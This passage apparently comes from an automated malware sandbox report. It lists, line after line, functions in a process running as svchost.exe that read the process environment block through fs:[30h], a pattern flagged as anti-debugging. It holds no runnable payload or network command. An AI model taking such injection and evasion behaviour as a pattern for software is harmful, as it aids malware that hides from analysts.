            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]1_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4180 mov eax, dword ptr fs:[00000030h]1_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov eax, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE10E mov ecx, dword ptr fs:[00000030h]1_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
